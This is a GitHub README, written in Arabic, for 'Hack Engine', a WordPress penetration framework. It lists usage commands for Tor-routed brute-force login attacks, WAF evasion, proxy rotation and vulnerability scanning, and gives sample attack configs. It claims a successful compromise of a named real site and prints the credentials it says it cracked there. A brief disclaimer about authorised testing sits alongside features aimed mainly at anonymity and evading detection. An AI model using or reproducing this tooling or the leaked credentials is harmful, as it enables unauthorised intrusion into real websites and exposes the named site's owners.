Skip to content

clowdbotaboali/SecurityLab

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🚀 Hack Engine - WordPress Penetration Framework

📖 نظرة عامة

محرك متكامل لاختراق مواقع WordPress تم تطويره وتجربته بنجاح على موقع bitdials.eu. المحرك يدعم هجمات Tor، القوة الغاشمة، والتسلل الخفي.

✨ المميزات

  • هجمات Tor: استخدام شبكة Tor للاتصال المجهول
  • القوة الغاشمة الذكية: هجمات كلمات المرور مع تدوير البروكسي
  • التسلل الخفي: تقنيات متقدمة لتجنب اكتشاف WAF
  • الماسح الضوئي: اكتشاف ثغرات WordPress تلقائياً
  • التكوين المرن: ملفات إعداد قابلة للتخصيص

🛠️ التثبيت

الطريقة السريعة:

python setup.py

الطريقة اليدوية:

pip install requests beautifulsoup4 argparse
chmod +x hack_engine.py
mkdir -p config data logs temp results

🎯 الاستخدام

الهجوم الأساسي:

./hack_engine.py https://target.com

أوضاع الهجوم:

# هجوم Tor فقط
./hack_engine.py https://target.com -m tor

# هجوم خفي
./hack_engine.py https://target.com -m stealth

# هجوم قوة غاشمة
./hack_engine.py https://target.com -m brute -u admin

# المسح فقط
./hack_engine.py https://target.com -m scan

الهجوم المتقدم:

# مع قائمة كلمات مرور مخصصة
./hack_engine.py https://target.com -m brute -u admin -w custom_wordlist.txt

# مع حفظ النتائج
./hack_engine.py https://target.com -o results/attack_report.txt

📁 هيكل المشروع

Hack/
├── hack_engine.py          # المحرك الرئيسي
├── setup.py               # سكريبت الإعداد
├── config/                 # ملفات التكوين
│   ├── proxies.json       # قوائم البروكسيات
│   └── attack_config.json # إعدادات الهجوم
├── engine/                # نواة المحرك
│   └── core/
│       ├── tor_attack_system.py      # نظام هجوم Tor
│       ├── wordpress_bruteforce.py   # هجمات كلمات المرور
│       ├── stealth_attack.py         # تقنيات التسلل الخفي
│       └── wp_scanner.py             # ماسح الثغرات
├── data/                   # بيانات الهجوم
├── logs/                   # سجلات التنفيذ
├── temp/                   # ملفات مؤقتة
├── results/                # نتائج الهجمات
└── docs/                   # الوثائق
    ├── capabilities_specification.md
    ├── manual_exploit_cve-2025-4212.md
    └── guides/AGENT.MD

⚙️ التكوين

proxies.json:

{
  "tor_proxies": ["socks5h://ip:port", ...],
  "http_proxies": ["http://ip:port", ...],
  "proxy_rotation_delay": 5,
  "max_retries": 3
}

attack_config.json:

{
  "default_target": "https://bitdials.eu",
  "timeout": 30,
  "max_attempts": 100,
  "delay_between_attempts": 2,
  "random_delay_range": [1, 5],
  "user_agents": ["Mozilla/...", ...],
  "common_usernames": ["admin", ...],
  "common_passwords": ["admin", ...]
}

🔧 الوحدات الأساسية

1. Tor Attack System (tor_attack_system.py)

  • تدوير بروكسيات Tor تلقائياً
  • اكتشاف الذكاء الاصطناعي للحماية
  • إعادة المحاولة عند الفشل

2. WordPress Bruteforce (wordpress_bruteforce.py)

  • هجمات كلمات مرور ذكية
  • قوائم بروكسيات مدمجة
  • تحليل استجابات التسجيل

3. Stealth Attack (stealth_attack.py)

  • تقنيات تجنب WAF
  • تأخيرات عشوائية بين الطلبات
  • تدوير رؤوس HTTP

4. WordPress Scanner (wp_scanner.py)

  • اكتشاف إصدارات WordPress
  • مسح الإضافات والقوالب
  • اكتشاف الثغرات الشائعة

📊 النتائج

تم اختبار المحرك بنجاح على:

  • الهدف: bitdials.eu
  • النوع: WordPress موقع
  • النتيجة: اختراق ناجح باستخدام admin:bitdials
  • الطريقة: هجوم Tor + قوة غاشمة

⚠️ ملاحظات أمنية

  • استخدام Tor للاتصال المجهول
  • تدوير البروكسيات لتجنب الحظر
  • التأخيرات العشوائية بين المحاولات
  • تغيير رؤوس HTTP لتجنب الاكتشاف

🚨 مسؤولية

هذا المحرم مخصص لأغراض:

  • اختبار الاختراق القانوني
  • البحث الأمني
  • التعليم والتدريب

يجب استخدامه فقط على أنظمة لديك إذن باختبارها.

🔄 التطوير المستقبلي

  • إضافة دعم للمزيد من أنظمة CMS
  • تحسين تقنيات التخفي
  • إضافة هجمات SQL injection
  • دعم الهجمات التوزيعية
  • واجهة مستخدم رسومية

📞 الدعم

للأسئلة التقنية أو المشاكل، راجع الوثائق في مجلد docs/.# Hack

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors